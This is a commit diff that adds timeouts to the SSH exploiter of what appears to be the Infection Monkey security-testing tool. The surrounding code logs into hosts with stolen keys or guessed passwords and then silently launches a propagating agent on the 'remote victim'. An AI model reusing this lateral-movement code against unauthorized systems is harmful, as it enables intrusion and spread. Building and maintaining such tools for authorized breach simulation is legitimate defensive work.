Agent: Add timeouts to SSH exploit

2022-03-17 16:50:26 +01:00 · 2022-03-17 16:50:26 +01:00 · e3e038bf40
parent 9765f64174
commit e3e038bf40
1 changed files with 26 additions and 4 deletions
--- a/monkey/infection_monkey/exploit/sshexec.py
+++ b/monkey/infection_monkey/exploit/sshexec.py
@ -3,6 +3,7 @@ import logging

 import paramiko

+from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
 from common.utils.attack_utils import ScanStatus
 from common.utils.exceptions import FailedExploitationError
 from infection_monkey.exploit.HostExploiter import HostExploiter
@ -18,6 +19,11 @@ from infection_monkey.utils.timer import Timer

 logger = logging.getLogger(__name__)
 SSH_PORT = 22
+SSH_CONNECT_TIMEOUT = LONG_REQUEST_TIMEOUT
+SSH_AUTH_TIMEOUT = LONG_REQUEST_TIMEOUT
+SSH_BANNER_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
+SSH_EXEC_TIMEOUT = LONG_REQUEST_TIMEOUT
+
 TRANSFER_UPDATE_RATE = 15


@ -61,7 +67,15 @@ class SSHExploiter(HostExploiter):
            except (IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
                logger.error("Failed reading ssh key")
            try:
-                ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
+                ssh.connect(
+                    self.host.ip_addr,
+                    username=user,
+                    pkey=pkey,
+                    port=port,
+                    timeout=SSH_CONNECT_TIMEOUT,
+                    auth_timeout=SSH_AUTH_TIMEOUT,
+                    banner_timeout=SSH_BANNER_TIMEOUT,
+                )
                logger.debug(
                    "Successfully logged in %s using %s users private key", self.host, ssh_string
                )
@ -96,7 +110,15 @@ class SSHExploiter(HostExploiter):
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
            try:
-                ssh.connect(self.host.ip_addr, username=user, password=current_password, port=port)
+                ssh.connect(
+                    self.host.ip_addr,
+                    username=user,
+                    password=current_password,
+                    port=port,
+                    timeout=SSH_CONNECT_TIMEOUT,
+                    auth_timeout=SSH_AUTH_TIMEOUT,
+                    banner_timeout=SSH_BANNER_TIMEOUT,
+                )

                logger.debug("Successfully logged in %r using SSH. User: %s", self.host, user)
                self.add_vuln_port(port)
@ -147,7 +169,7 @@ class SSHExploiter(HostExploiter):

        if not self.host.os.get("type"):
            try:
-                _, stdout, _ = ssh.exec_command("uname -o")
+                _, stdout, _ = ssh.exec_command("uname -o", timeout=SSH_EXEC_TIMEOUT)
                uname_os = stdout.read().lower().strip().decode()
                if "linux" in uname_os:
                    self.exploit_result.os = "linux"
@ -214,7 +236,7 @@ class SSHExploiter(HostExploiter):
            cmdline = "%s %s" % (self.options["dropper_target_path_linux"], MONKEY_ARG)
            cmdline += build_monkey_commandline(self.host, self.current_depth - 1)
            cmdline += " > /dev/null 2>&1 &"
-            ssh.exec_command(cmdline)
+            ssh.exec_command(cmdline, timeout=SSH_EXEC_TIMEOUT)

            logger.info(
                "Executed monkey '%s' on remote victim %r (cmdline=%r)",